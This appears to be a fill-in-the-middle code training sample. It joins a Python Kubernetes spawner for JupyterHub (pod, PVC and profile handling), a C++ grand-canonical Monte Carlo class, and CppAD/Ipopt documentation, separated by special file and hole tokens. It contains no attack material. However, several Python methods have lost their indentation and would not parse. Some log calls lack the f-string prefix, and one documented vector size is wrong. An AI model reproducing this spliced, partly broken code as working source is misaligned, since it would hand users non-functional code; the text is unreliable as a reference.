        Designed to be used with exponential_backoff, so returns
        True / False on success / failure
        """
        try:
            self.log.info(
                f"Attempting to create pod {pod.metadata.name}, with timeout {request_timeout}"
            )
            await asyncio.wait_for(
                self.api.create_namespaced_pod(
                    self.namespace,
                    pod,
                ),
                request_timeout,
            )
            return True
        except asyncio.TimeoutError:
            # Just try again
            return False
        except ApiException as e:
            pod_name = pod.metadata.name
            if e.status != 409:
                # We only want to handle 409 conflict errors
                self.log.exception("Failed for %s", pod.to_str())
                raise
            # 409: a pod with this name already exists (e.g. leftover from a
            # previous spawn); delete it and let exponential_backoff retry.
            self.log.info(f'Found existing pod {pod_name}, attempting to kill')
            # TODO: this should show up in events
            await self.stop(True)
            self.log.info(
                f'Killed pod {pod_name}, will try starting singleuser pod again'
            )
            # We tell exponential_backoff to retry
            return False
async def _make_create_pvc_request(self, pvc, request_timeout):
# Try and create the pvc. If it succeeds we are good. If
# returns a 409 indicating it already exists we are good. If
# it returns a 403, indicating potential quota issue we need
# to see if pvc already exists before we decide to raise the
# error for quota being exceeded. This is because quota is
# checked before determining if the PVC needed to be
# created.
pvc_name = pvc.metadata.name
try:
self.log.info(
f"Attempting to create pvc {pvc.metadata.name}, with timeout {request_timeout}"
)
await asyncio.wait_for(
self.api.create_namespaced_persistent_volume_claim(
namespace=self.namespace,
body=pvc,
),
request_timeout,
)
return True
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 409:
self.log.info(
"PVC " + pvc_name + " already exists, so did not create new pvc."
)
return True
elif e.status == 403:
t, v, tb = sys.exc_info()
try:
await self.api.read_namespaced_persistent_volume_claim(
name=pvc_name,
namespace=self.namespace,
)
except ApiException as e:
raise v.with_traceback(tb)
self.log.info(
"PVC "
+ self.pvc_name
+ " already exists, possibly have reached quota though."
)
return True
else:
raise
async def _ensure_not_exists(self, kind, name):
"""Ensure a resource does not exist
Request deletion and wait for it to be gone
Designed to be used with exponential_backoff, so returns
True when the resource no longer exists, False otherwise
"""
delete = getattr(self.api, "delete_namespaced_{}".format(kind))
read = getattr(self.api, "read_namespaced_{}".format(kind))
# first, attempt to delete the resource
try:
self.log.info(f"Deleting {kind}/{name}")
await asyncio.wait_for(
delete(namespace=self.namespace, name=name),
self.k8s_api_request_timeout,
)
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 404:
self.log.info(f"{kind}/{name} is gone")
# no such resource, delete successful
return True
self.log.exception("Error deleting {kind}/{name}: {e}")
return False
try:
self.log.info(f"Checking for {kind}/{name}")
await asyncio.wait_for(
read(namespace=self.namespace, name=name), self.k8s_api_request_timeout
)
except asyncio.TimeoutError:
# Just try again
return False
except ApiException as e:
if e.status == 404:
self.log.info(f"{kind}/{name} is gone")
return True
self.log.exception("Error reading {kind}/{name}: {e}")
return False
# if we got here, resource still exists, try again
return False
    async def _make_create_resource_request(self, kind, manifest):
        """Make an HTTP request to create the given resource

        kind: the namespaced resource kind, e.g. "secret" or "service"
        (used to look up ``create_namespaced_<kind>`` on the API client).

        Designed to be used with exponential_backoff, so returns
        True / False on success / failure
        """
        create = getattr(self.api, f"create_namespaced_{kind}")
        self.log.info(f"Attempting to create {kind} {manifest.metadata.name}")
        try:
            await asyncio.wait_for(
                create(self.namespace, manifest), self.k8s_api_request_timeout
            )
        except asyncio.TimeoutError:
            # Just try again
            return False
        except ApiException as e:
            name = manifest.metadata.name
            if e.status == 409:
                # already present counts as success
                self.log.info(f'Found existing {kind} {name}')
                return True
            # We only want to handle 409 conflict errors
            self.log.exception("Failed to create %s", manifest.to_str())
            raise
        else:
            return True
    async def _start(self):
        """Start the user's pod

        Orchestration: load options -> (optional) namespace -> (optional) PVC
        -> pod -> (optional) internal-ssl secret+service -> wait for running
        -> return the connect url.
        """
        # load user options (including profile)
        await self.load_user_options()

        # If we have user_namespaces enabled, create the namespace.
        #  It's fine if it already exists.
        if self.enable_user_namespaces:
            await self._ensure_namespace()

        # record latest event so we don't include old
        # events from previous pods in self.events
        # track by order and name instead of uid
        # so we get events like deletion of a previously stale
        # pod if it's part of this spawn process
        events = self.events
        if events:
            self._last_event = events[-1]["metadata"]["uid"]

        if self.storage_pvc_ensure:
            pvc = self.get_pvc_manifest()

            # If there's a timeout, just let it propagate
            await exponential_backoff(
                partial(
                    self._make_create_pvc_request, pvc, self.k8s_api_request_timeout
                ),
                f'Could not create PVC {self.pvc_name}',
                # Each req should be given k8s_api_request_timeout seconds.
                timeout=self.k8s_api_request_retry_timeout,
            )

        # If we run into a 409 Conflict error, it means a pod with the
        # same name already exists. We stop it, wait for it to stop, and
        # try again. We try 4 times, and if it still fails we give up.
        pod = await self.get_pod_manifest()
        if self.modify_pod_hook:
            # user hook gets the last word on the pod manifest
            pod = await gen.maybe_future(self.modify_pod_hook(self, pod))

        ref_key = "{}/{}".format(self.namespace, self.pod_name)
        # If there's a timeout, just let it propagate
        await exponential_backoff(
            partial(self._make_create_pod_request, pod, self.k8s_api_request_timeout),
            f'Could not create pod {ref_key}',
            timeout=self.k8s_api_request_retry_timeout,
        )

        if self.internal_ssl:
            try:
                # wait for pod to have uid,
                # required for creating owner reference
                await exponential_backoff(
                    lambda: self.pod_has_uid(
                        self.pod_reflector.pods.get(ref_key, None)
                    ),
                    f"pod/{ref_key} does not have a uid!",
                )

                pod = self.pod_reflector.pods[ref_key]
                owner_reference = make_owner_reference(
                    self.pod_name, pod["metadata"]["uid"]
                )

                # internal ssl, create secret object
                secret_manifest = self.get_secret_manifest(owner_reference)
                await exponential_backoff(
                    partial(
                        self._ensure_not_exists, "secret", secret_manifest.metadata.name
                    ),
                    f"Failed to delete secret {secret_manifest.metadata.name}",
                )
                await exponential_backoff(
                    partial(
                        self._make_create_resource_request, "secret", secret_manifest
                    ),
                    f"Failed to create secret {secret_manifest.metadata.name}",
                )

                service_manifest = self.get_service_manifest(owner_reference)
                await exponential_backoff(
                    partial(
                        self._ensure_not_exists,
                        "service",
                        service_manifest.metadata.name,
                    ),
                    f"Failed to delete service {service_manifest.metadata.name}",
                )
                await exponential_backoff(
                    partial(
                        self._make_create_resource_request, "service", service_manifest
                    ),
                    f"Failed to create service {service_manifest.metadata.name}",
                )
            except Exception:
                # cleanup on failure and re-raise
                await self.stop(True)
                raise

        # we need a timeout here even though start itself has a timeout
        # in order for this coroutine to finish at some point.
        # using the same start_timeout here
        # essentially ensures that this timeout should never propagate up
        # because the handler will have stopped waiting after
        # start_timeout, starting from a slightly earlier point.
        try:
            await exponential_backoff(
                lambda: self.is_pod_running(self.pod_reflector.pods.get(ref_key, None)),
                'pod %s did not start in %s seconds!' % (ref_key, self.start_timeout),
                timeout=self.start_timeout,
            )
        except TimeoutError:
            if ref_key not in self.pod_reflector.pods:
                # if pod never showed up at all,
                # restart the pod reflector which may have become disconnected.
                self.log.error(
                    "Pod %s never showed up in reflector, restarting pod reflector",
                    ref_key,
                )
                self.log.error("Pods: {}".format(self.pod_reflector.pods))
                self._start_watching_pods(replace=True)
            raise

        pod = self.pod_reflector.pods[ref_key]
        self.pod_id = pod["metadata"]["uid"]
        if self.event_reflector:
            self.log.debug(
                'pod %s events before launch: %s',
                ref_key,
                "\n".join(
                    [
                        "%s [%s] %s"
                        % (
                            event["lastTimestamp"] or event["eventTime"],
                            event["type"],
                            event["message"],
                        )
                        for event in self.events
                    ]
                ),
            )

        return self._get_pod_url(pod)
    async def _make_delete_pod_request(
        self, pod_name, delete_options, grace_seconds, request_timeout
    ):
        """
        Make an HTTP request to delete the given pod

        Designed to be used with exponential_backoff, so returns
        True / False on success / failure
        """
        ref_key = "{}/{}".format(self.namespace, pod_name)
        self.log.info("Deleting pod %s", ref_key)
        try:
            await asyncio.wait_for(
                self.api.delete_namespaced_pod(
                    name=pod_name,
                    namespace=self.namespace,
                    body=delete_options,
                    grace_period_seconds=grace_seconds,
                ),
                request_timeout,
            )
            return True
        except asyncio.TimeoutError:
            # tell exponential_backoff to try again
            return False
        except ApiException as e:
            if e.status == 404:
                self.log.warning(
                    "No pod %s to delete. Assuming already deleted.",
                    ref_key,
                )
                # If there isn't already a pod, that's ok too!
                return True
            else:
                raise
    async def _make_delete_pvc_request(self, pvc_name, request_timeout):
        """
        Make an HTTP request to delete the given PVC

        Designed to be used with exponential_backoff, so returns
        True / False on success / failure
        """
        self.log.info("Deleting pvc %s", pvc_name)
        try:
            await asyncio.wait_for(
                self.api.delete_namespaced_persistent_volume_claim(
                    name=pvc_name,
                    namespace=self.namespace,
                ),
                request_timeout,
            )
            return True
        except asyncio.TimeoutError:
            # tell exponential_backoff to try again
            return False
        except ApiException as e:
            if e.status == 404:
                self.log.warning(
                    "No pvc %s to delete. Assuming already deleted.",
                    pvc_name,
                )
                # If there isn't a PVC to delete, that's ok too!
                return True
            else:
                raise
    @_await_pod_reflector
    async def stop(self, now=False):
        """Delete the user's pod.

        now=False: graceful termination with `delete_grace_period` seconds.
        now=True: force-kill with grace period 0.
        Waits until the pod disappears from the reflector's cache.
        """
        delete_options = client.V1DeleteOptions()

        if now:
            grace_seconds = 0
        else:
            grace_seconds = self.delete_grace_period

        delete_options.grace_period_seconds = grace_seconds

        ref_key = "{}/{}".format(self.namespace, self.pod_name)
        await exponential_backoff(
            partial(
                self._make_delete_pod_request,
                self.pod_name,
                delete_options,
                grace_seconds,
                self.k8s_api_request_timeout,
            ),
            f'Could not delete pod {ref_key}',
            timeout=self.k8s_api_request_retry_timeout,
        )

        try:
            # wait for the reflector to observe the deletion
            await exponential_backoff(
                lambda: self.pod_reflector.pods.get(ref_key, None) is None,
                'pod %s did not disappear in %s seconds!'
                % (ref_key, self.start_timeout),
                timeout=self.start_timeout,
            )
        except TimeoutError:
            self.log.error(
                "Pod %s did not disappear, restarting pod reflector", ref_key
            )
            self._start_watching_pods(replace=True)
            raise
    @default('env_keep')
    def _env_keep_default(self):
        # None of the hub process's environment is inherited:
        # the pod runs in a completely separate environment.
        return []
    # cached, slug-initialized copy of profile_list; populated lazily
    _profile_list = None

    def _render_options_form(self, profile_list):
        # caches the initialized profile list, then renders the
        # profile_form_template with it
        self._profile_list = self._init_profile_list(profile_list)
        profile_form_template = Environment(loader=BaseLoader).from_string(
            self.profile_form_template
        )
        return profile_form_template.render(profile_list=self._profile_list)
    async def _render_options_form_dynamically(self, current_spawner):
        # resolve a callable profile_list (possibly async), then render.
        # NOTE: _render_options_form re-runs _init_profile_list; that is
        # redundant but harmless (slug initialization is idempotent).
        profile_list = await gen.maybe_future(self.profile_list(current_spawner))
        profile_list = self._init_profile_list(profile_list)
        return self._render_options_form(profile_list)
    @default('options_form')
    def _options_form_default(self):
        """
        Build the form template according to the `profile_list` setting.

        Returns:
            '' when no `profile_list` has been defined
            The rendered template (using jinja2) when `profile_list` is defined.
        """
        if not self.profile_list:
            return ''
        if callable(self.profile_list):
            # return the coroutine itself; JupyterHub calls it per-request
            return self._render_options_form_dynamically
        else:
            return self._render_options_form(self.profile_list)
    @default('options_from_form')
    def _options_from_form_default(self):
        # use our form parser unless the deployment overrides it
        return self._options_from_form
def _options_from_form(self, formdata):
"""get the option selected by the user on the form
This only constructs the user_options dict,
it should not actually load any options.
That is done later in `.load_user_options()`
Args:
formdata: user selection returned by the form
To access to the value, you can use the `get` accessor and the name of the html element,
for example::
formdata.get('profile',[0])
to get the value of the form named "profile", as defined in `form_template`::
<select class="form-control" name="profile"...>
</select>
Returns:
user_options (dict): the selected profile in the user_options form,
e.g. ``{"profile": "cpus-8"}``
"""
return {'profile': formdata.get('profile', [None])[0]}
    async def _load_profile(self, slug):
        """Load a profile by name

        Called by load_user_options

        Raises ValueError when ``slug`` is given but matches no profile.
        """
        # find the profile
        default_profile = self._profile_list[0]
        for profile in self._profile_list:
            if profile.get('default', False):
                # explicit default, not the first
                default_profile = profile

            if profile['slug'] == slug:
                break
        else:
            # for-else: the loop did NOT break, i.e. no profile matched slug
            if slug:
                # name specified, but not found
                raise ValueError(
                    "No such profile: %s. Options include: %s"
                    % (slug, ', '.join(p['slug'] for p in self._profile_list))
                )
            else:
                # no name specified, use the default
                profile = default_profile

        self.log.debug(
            "Applying KubeSpawner override for profile '%s'", profile['display_name']
        )
        kubespawner_override = profile.get('kubespawner_override', {})
        for k, v in kubespawner_override.items():
            if callable(v):
                # callables are resolved with this spawner before applying
                v = v(self)
                self.log.debug(
                    ".. overriding KubeSpawner value %s=%s (callable result)", k, v
                )
            else:
                self.log.debug(".. overriding KubeSpawner value %s=%s", k, v)

            setattr(self, k, v)
    # set of recognised user option keys
    # used for warning about ignoring unrecognised options
    _user_option_keys = {
        'profile',
    }

    def _init_profile_list(self, profile_list):
        # generate missing slug fields from display_name
        # (idempotent: profiles that already have a slug are untouched)
        for profile in profile_list:
            if 'slug' not in profile:
                profile['slug'] = slugify(profile['display_name'])

        return profile_list
async def load_user_options(self):
    """Load user options from self.user_options dict

    This can be set via POST to the API or via options_from_form

    Only supported argument by default is 'profile'.
    Override in subclasses to support other options.
    """
    if self._profile_list is None:
        # resolve profile_list lazily; it may be a (possibly async)
        # callable that receives the spawner
        if callable(self.profile_list):
            profile_list = await gen.maybe_future(self.profile_list(self))
        else:
            profile_list = self.profile_list
        # cache the normalized list (slugs filled in)
        self._profile_list = self._init_profile_list(profile_list)
    selected_profile = self.user_options.get('profile', None)
    if self._profile_list:
        # apply the selected (or default) profile's overrides
        await self._load_profile(selected_profile)
    elif selected_profile:
        self.log.warning(
            "Profile %r requested, but profiles are not enabled", selected_profile
        )
    # help debugging by logging any option fields that are not recognized
    option_keys = set(self.user_options)
    unrecognized_keys = option_keys.difference(self._user_option_keys)
    if unrecognized_keys:
        self.log.warning(
            "Ignoring unrecognized KubeSpawner user_options: %s",
            ", ".join(map(str, sorted(unrecognized_keys))),
        )
async def _ensure_namespace(self):
    """Create the target Kubernetes namespace if it does not exist.

    A 409 Conflict from the API (namespace already present) is treated
    as success; any other API error is logged and re-raised.
    """
    ns = make_namespace(self.namespace)
    api = self.api
    try:
        await asyncio.wait_for(
            api.create_namespace(ns),
            self.k8s_api_request_timeout,
        )
    except ApiException as e:
        if e.status != 409:
            # 409 means it already exists, which is fine;
            # anything else is a real failure
            self.log.exception("Failed to create namespace %s", self.namespace)
            raise
async def delete_forever(self):
    """Called when a user is deleted.

    This can do things like request removal of resources such as persistent storage.
    Only called on stopped spawners, and is likely the last action ever taken for the user.

    Called on each spawner after deletion,
    i.e. on named server deletion (not just stop),
    and on the default Spawner when the user is being deleted.

    Requires JupyterHub 1.4.1+

    .. versionadded: 0.17
    """
    # include the server name in log messages for named servers
    log_name = self.user.name
    if self.name:
        log_name = f"{log_name}/{self.name}"
    if not self.delete_pvc:
        # PVC deletion disabled by configuration
        self.log.info(f"Not deleting pvc for {log_name}: {self.pvc_name}")
        return
    if self.name and '{servername}' not in self.pvc_name_template:
        # named server has the same PVC as the default server
        # don't delete the default server's PVC!
        self.log.info(
            f"Not deleting shared pvc for named server {log_name}: {self.pvc_name}"
        )
        return
    # retry the delete with exponential backoff until it succeeds or
    # the overall retry timeout elapses
    await exponential_backoff(
        partial(
            self._make_delete_pvc_request,
            self.pvc_name,
            self.k8s_api_request_timeout,
        ),
        f'Could not delete pvc {self.pvc_name}',
        timeout=self.k8s_api_request_retry_timeout,
)<|fim▁end|> |
# specify default ssl alt names |
<|file_name|>gcmc.cpp<|end_file_name|><|fim▁begin|>/*--------------------------------------------
Created by Sina on 06/05/13.
Copyright (c) 2013 MIT. All rights reserved.
--------------------------------------------*/
#include "elements.h"
#include "mpi_compat.h"
#include "gcmc.h"
#include "memory.h"
#include "random.h"
#include "neighbor.h"
#include "ff_md.h"
#include "MAPP.h"
#include "atoms_md.h"
#include "comm.h"
#include "dynamic_md.h"
using namespace MAPP_NS;
/*--------------------------------------------
 constructor

 caches references into the atoms / force
 field / communicator state, seeds the RNG,
 and zeroes the buffers that box_setup() and
 add_del_id() allocate later
 --------------------------------------------*/
GCMC::GCMC(AtomsMD*& __atoms,ForceFieldMD*&__ff,DynamicMD*& __dynamic,elem_type __gas_type,type0 __mu,type0 __T,int seed):
gas_type(__gas_type),
T(__T),
mu(__mu),
natms_lcl(__atoms->natms_lcl),
natms_ph(__atoms->natms_ph),
cut_sq(__ff->cut_sq),
s_lo(__atoms->comm.s_lo),
s_hi(__atoms->comm.s_hi),
dynamic(__dynamic),
world(__atoms->comm.world),
atoms(__atoms),
ff(__ff),
ielem(gas_type)
{
    random=new Random(seed);
    // one pointer per spatial dimension; the flat storage behind
    // *s_trials is allocated in box_setup()
    s_trials=new type0*[__dim__];
    *s_trials=NULL;
    // free-list of recycled atom ids (grown on demand in add_del_id)
    del_ids=NULL;
    del_ids_sz=del_ids_cpcty=0;
    vars=lcl_vars=NULL;
}
/*--------------------------------------------
 destructor
 --------------------------------------------*/
GCMC::~GCMC()
{
    // NOTE(review): only the outer pointer array is freed here; the
    // flat buffer *s_trials (allocated in box_setup) is expected to
    // have been released by box_dismantle() already — TODO confirm
    delete [] del_ids;
    delete [] s_trials;
    delete random;
}
/*--------------------------------------------
 append `no` recycled atom ids to the
 free-list, growing its storage as needed

 grows capacity geometrically (doubling, or
 to the exact requirement if larger) so that
 repeated appends cost amortized O(1) copies
 instead of the O(n) per call that exact-fit
 reallocation incurs
 --------------------------------------------*/
void GCMC::add_del_id(int* new_ids,int no)
{
    if(del_ids_sz+no>del_ids_cpcty)
    {
        // at least double, but never less than what this call needs
        int new_cpcty=del_ids_sz+no>2*del_ids_cpcty ? del_ids_sz+no : 2*del_ids_cpcty;
        int* del_ids_=new int[new_cpcty];
        memcpy(del_ids_,del_ids,del_ids_sz*sizeof(int));
        del_ids_cpcty=new_cpcty;
        delete [] del_ids;
        del_ids=del_ids_;
    }
    memcpy(del_ids+del_ids_sz,new_ids,sizeof(int)*no);
    del_ids_sz+=no;
}
/*--------------------------------------------
 hand out an atom id: reuse the most recently
 recycled id from the free-list when one is
 available, otherwise mint a fresh id one past
 the current maximum
 --------------------------------------------*/
int GCMC::get_new_id()
{
    if(del_ids_sz==0)
        return ++max_id;
    return del_ids[--del_ids_sz];
}
/*--------------------------------------------
 per-run initialization: interaction cutoff,
 thermodynamic prefactors, the global maximum
 atom id, and the current gas-atom count
 --------------------------------------------*/
void GCMC::init()
{
    // widest cutoff between the gas element and any element present
    cut=ff->cut[ielem][0];
    for(size_t i=1;i<atoms->elements.nelems;i++)
        cut=MAX(cut,ff->cut[ielem][i]);
    gas_mass=atoms->elements.masses[gas_type];
    kbT=atoms->kB*T;
    beta=1.0/kbT;
    // thermal de Broglie wavelength h/sqrt(2*pi*m*kB*T)
    lambda=atoms->hP/sqrt(2.0*M_PI*kbT*gas_mass);
    // velocity scale sqrt(kB*T/m)
    sigma=sqrt(kbT/gas_mass);
    // activity factor exp(beta*mu)/lambda^dim
    z_fac=1.0;
    for(int i=0;i<__dim__;i++) z_fac/=lambda;
    z_fac*=exp(beta*mu);
    // cell volume from the diagonal of H
    // (assumes a triangular cell matrix — TODO confirm)
    vol=1.0;
    for(int i=0;i<__dim__;i++)vol*=atoms->H[i][i];
    // global maximum id across all ranks, also covering ids parked
    // on the local free-list
    id_type max_id_=0;
    id_type* id=atoms->id->begin();
    for(int i=0;i<natms_lcl;i++)
        max_id_=MAX(id[i],max_id_);
    MPI_Allreduce(&max_id_,&max_id,1,Vec<id_type>::MPI_T,MPI_MAX,world);
    for(int i=0;i<del_ids_sz;i++)
        max_id=MAX(max_id,del_ids[i]);
    // count local gas atoms, then reduce to the global count
    ngas_lcl=0;
    elem_type* elem=atoms->elem->begin();
    for(int i=0;i<natms_lcl;i++)
        if(elem[i]==gas_type) ngas_lcl++;
    MPI_Allreduce(&ngas_lcl,&ngas,1,MPI_INT,MPI_SUM,world);
}
/*--------------------------------------------
 finalize a GCMC run; intentionally empty —
 there is currently nothing to tear down here
 --------------------------------------------*/
void GCMC::fin()
{
}
/*--------------------------------------------
 per-box setup: express the interaction cutoff
 in fractional (s) coordinates, count the
 periodic images needed in each dimension, and
 allocate the flat trial-offset storage
 --------------------------------------------*/
void GCMC::box_setup()
{
    int sz=0;
    max_ntrial_atms=1;
    for(int i=0;i<__dim__;i++)
    {
        // column norm of B scales the cutoff into s-coordinates
        // (B presumably is the inverse cell matrix — TODO confirm)
        type0 tmp=0.0;
        for(int j=i;j<__dim__;j++)
            tmp+=atoms->B[j][i]*atoms->B[j][i];
        cut_s[i]=sqrt(tmp)*cut;
        // pad this rank's subdomain by the cutoff on both sides
        s_lo_ph[i]=s_lo[i]-cut_s[i];
        s_hi_ph[i]=s_hi[i]+cut_s[i];
        // images crossed above and below the unit cell in dimension i
        nimages_per_dim[i][0]=static_cast<int>(floor(s_hi_ph[i]));
        nimages_per_dim[i][1]=-static_cast<int>(floor(s_lo_ph[i]));
        max_ntrial_atms*=1+nimages_per_dim[i][0]+nimages_per_dim[i][1];
        sz+=1+nimages_per_dim[i][0]+nimages_per_dim[i][1];
    }
    // one flat buffer; s_trials[1..] are interior pointers into it
    // (released by box_dismantle)
    *s_trials=new type0[sz];
    for(int i=1;i<__dim__;i++)
        s_trials[i]=s_trials[i-1]+1+nimages_per_dim[i-1][0]+nimages_per_dim[i-1][1];
}
/*--------------------------------------------
 release the flat trial-offset storage that
 box_setup() allocated
 --------------------------------------------*/
void GCMC::box_dismantle()
{
    // only s_trials[0] owns the allocation; the other entries are
    // interior pointers into the same buffer (see box_setup)
    delete [] *s_trials;
    *s_trials=NULL;
<|file_name|>cppad_ipopt_nlp.hpp<|end_file_name|><|fim▁begin|>// $Id$
# ifndef CPPAD_CPPAD_IPOPT_NLP_HPP
# define CPPAD_CPPAD_IPOPT_NLP_HPP
/* --------------------------------------------------------------------------
CppAD: C++ Algorithmic Differentiation: Copyright (C) 2003-15 Bradley M. Bell
CppAD is distributed under multiple licenses. This distribution is under
the terms of the
Eclipse Public License Version 1.0.
A copy of this license is included in the COPYING file of this distribution.
Please visit http://www.coin-or.org/CppAD/ for information on other licenses.
-------------------------------------------------------------------------- */
/*
$begin cppad_ipopt_nlp$$
$dollar @$$
$spell
libipopt
namespace
dir
cppad
bool
doesn't
nan
inf
naninf
std
maxiter
infeasibility
obj
const
optimizer
cppad_ipopt_nlp.hpp
fg_info.eval
retape
CppAD
$$
$section Nonlinear Programming Using the CppAD Interface to Ipopt$$
$mindex AD$$
$head Deprecated 2012-11-28$$
This interface to Ipopt is deprecated, use $cref ipopt_solve$$ instead.
$head Syntax$$
$codei%# include "cppad_ipopt_nlp.hpp"
%$$
$codei%cppad_ipopt_solution %solution%;
%$$
$codei%cppad_ipopt_nlp %cppad_nlp%(
%n%, %m%, %x_i%, %x_l%, %x_u%, %g_l%, %g_u%, &%fg_info%, &%solution%
)%$$
$codei%
export LD_LIBRARY_PATH=@LD_LIBRARY_PATH:%ipopt_library_paths%$$
$head Purpose$$
The class $code cppad_ipopt_nlp$$ is used to solve nonlinear programming
problems of the form
$latex \[
\begin{array}{rll}
{\rm minimize} & f(x)
\\
{\rm subject \; to} & g^l \leq g(x) \leq g^u
\\
& x^l \leq x \leq x^u
\end{array}
\] $$
This is done using
$href%
http://www.coin-or.org/projects/Ipopt.xml%
Ipopt
%$$
optimizer and
$href%
http://www.coin-or.org/CppAD/%
CppAD
%$$
Algorithmic Differentiation package.
$head cppad_ipopt namespace$$
All of the declarations for these routines
are in the $code cppad_ipopt$$ namespace
(not the $code CppAD$$ namespace).
For example; $cref/SizeVector/cppad_ipopt_nlp/SizeVector/$$ below
actually denotes the type $code cppad_ipopt::SizeVector$$.
$head ipopt_library_paths$$
If you are linking to a shared version of the Ipopt library,
you may have to add some paths the $code LD_LIBRARY_PATH$$
shell variable using the $code export$$ command in the syntax above.
For example, if the file the ipopt library is
$codei%
%ipopt_prefix%/lib64/libipopt.a
%$$
you will need to add the corresponding directory; e.g.,
$codei%
export LD_LIBRARY_PATH="%ipopt_prefix%/lib64%:@LD_LIBRARY_PATH"
%$$
see $cref ipopt_prefix$$.
$head fg(x)$$
The function $latex fg : \B{R}^n \rightarrow \B{R}^{m+1}$$ is defined by
$latex \[
\begin{array}{rcl}
fg_0 (x) & = & f(x) \\
fg_1 (x) & = & g_0 (x) \\
& \vdots & \\
fg_m (x) & = & g_{m-1} (x)
\end{array}
\] $$
$subhead Index Vector$$<|fim▁hole|>for which none of the values are equal; i.e.,
it is both a vector and a set.
If $latex I$$ is an index vector $latex |I|$$ is used to denote the
number of elements in $latex I$$ and $latex \| I \|$$ is used
to denote the value of the maximum element in $latex I$$.
$subhead Projection$$
Given an index vector $latex J$$ and a positive integer $latex n$$
where $latex n > \| J \|$$, we use $latex J \otimes n $$ for
the mapping $latex ( J \otimes n ) : \B{R}^n \rightarrow \B{R}^{|J|}$$ defined by
$latex \[
[ J \otimes n ] (x)_j = x_{J(j)}
\] $$
for $latex j = 0 , \ldots |J| - 1$$.
$subhead Injection$$
Given an index vector $latex I$$ and a positive integer $latex m$$
where $latex m > \| I \|$$, we use $latex m \otimes I$$ for
the mapping $latex ( m \otimes I ): \B{R}^{|I|} \rightarrow \B{R}^m$$ defined by
$latex \[
[ m \otimes I ] (y)_i = \left\{ \begin{array}{ll}
y_k & {\rm if} \; i = I(k) \; {\rm for \; some} \;
k \in \{ 0 , \cdots, |I|-1 \}
\\
0 & {\rm otherwise}
\end{array} \right.
\] $$
$subhead Representation$$
In many applications, each of the component functions of $latex fg(x)$$
only depend on a few of the components of $latex x$$.
In this case, expressing $latex fg(x)$$ in terms of simpler functions
with fewer arguments can greatly reduce the amount of work required
to compute its derivatives.
$pre
$$
We use the functions
$latex r_k : \B{R}^{q(k)} \rightarrow \B{R}^{p(k)}$$
for $latex k = 0 , \ldots , K$$ to express our
representation of $latex fg(x)$$ in terms of simpler functions
as follows
$latex \[
fg(x) = \sum_{k=0}^{K-1} \; \sum_{\ell=0}^{L(k) - 1}
[ (m+1) \otimes I_{k,\ell} ] \; \circ
\; r_k \; \circ \; [ J_{k,\ell} \otimes n ] \; (x)
\] $$
where $latex \circ$$ represents function composition,
for $latex k = 0 , \ldots , K - 1$$, and $latex \ell = 0 , \ldots , L(k)$$,
$latex I_{k,\ell}$$ and $latex J_{k,\ell}$$ are index vectors with
$latex | J_{k,\ell} | = q(k)$$,
$latex \| J_{k,\ell} \| < n$$,
$latex | I_{k,\ell} | = p(k)$$, and
$latex \| I_{k,\ell} \| \leq m$$.
$head Simple Representation$$
In the simple representation,
$latex r_0 (x) = fg(x)$$,
$latex K = 1$$,
$latex q(0) = n$$,
$latex p(0) = m+1$$,
$latex L(0) = 1$$,
$latex I_{0,0} = (0 , \ldots , m)$$,
and $latex J_{0,0} = (0 , \ldots , n-1)$$.
$head SizeVector$$
The type $codei SizeVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code size_t$$.
$head NumberVector$$
The type $codei NumberVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code Ipopt::Number$$.
$head ADNumber$$
The type $codei ADNumber$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
an AD type that can be used to compute derivatives.
$head ADVector$$
The type $codei ADVector$$ is defined by the
$codei cppad_ipopt_nlp.hpp$$ include file to be a
$cref SimpleVector$$ class with elements of type
$code ADNumber$$.
$head n$$
The argument $icode n$$ has prototype
$codei%
size_t %n%
%$$
It specifies the dimension of the argument space;
i.e., $latex x \in \B{R}^n$$.
$head m$$
The argument $icode m$$ has prototype
$codei%
size_t %m%
%$$
It specifies the dimension of the range space for $latex g$$;
i.e., $latex g : \B{R}^n \rightarrow \B{R}^m$$.
$head x_i$$
The argument $icode x_i$$ has prototype
$codei%
const NumberVector& %x_i%
%$$
and its size is equal to $latex n$$.
It specifies the initial point where Ipopt starts the optimization process.
$head x_l$$
The argument $icode x_l$$ has prototype
$codei%
const NumberVector& %x_l%
%$$
and its size is equal to $latex n$$.
It specifies the lower limits for the argument in the optimization problem;
i.e., $latex x^l$$.
$head x_u$$
The argument $icode x_u$$ has prototype
$codei%
const NumberVector& %x_u%
%$$
and its size is equal to $latex n$$.
It specifies the upper limits for the argument in the optimization problem;
i.e., $latex x^u$$.
$head g_l$$
The argument $icode g_l$$ has prototype
$codei%
const NumberVector& %g_l%
%$$
and its size is equal to $latex m$$.
It specifies the lower limits for the constraints in the optimization problem;
i.e., $latex g^l$$.
$head g_u$$
The argument $icode g_u$$ has prototype
$codei%
const NumberVector& %g_u%
%$$
and its size is equal to $latex n$$.
It specifies the upper limits for the constraints in the optimization problem;
i.e., $latex g^u$$.
$head fg_info$$
The argument $icode fg_info$$ has prototype
$codei%
%FG_info fg_info%
%$$
where the class $icode FG_info$$ is derived from the
base class $code cppad_ipopt_fg_info$$.
Certain virtual member functions of $icode fg_info$$ are used to
compute the value of $latex fg(x)$$.
The specifications for these member functions are given below:
$subhead fg_info.number_functions$$
This member function has prototype
$codei%
virtual size_t cppad_ipopt_fg_info::number_functions(void)
%$$
If $icode K$$ has type $code size_t$$, the syntax
$codei%
%K% = %fg_info%.number_functions()
%$$
sets $icode K$$ to the number of functions used in the
representation of $latex fg(x)$$; i.e., $latex K$$ in
the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$ above.
$pre
$$
The $code cppad_ipopt_fg_info$$ implementation of this function
corresponds to the simple representation mentioned above; i.e.
$icode%K% = 1%$$.
$subhead fg_info.eval_r$$
This member function has the prototype
$codei%
virtual ADVector cppad_ipopt_fg_info::eval_r(size_t %k%, const ADVector& %u%) = 0;
%$$
Thus it is a pure virtual function and must be defined in the
derived class $icode FG_info$$.
$pre
$$
This function computes the value of $latex r_k (u)$$
used in the $cref/representation/cppad_ipopt_nlp/fg(x)/Representation/$$
for $latex fg(x)$$.
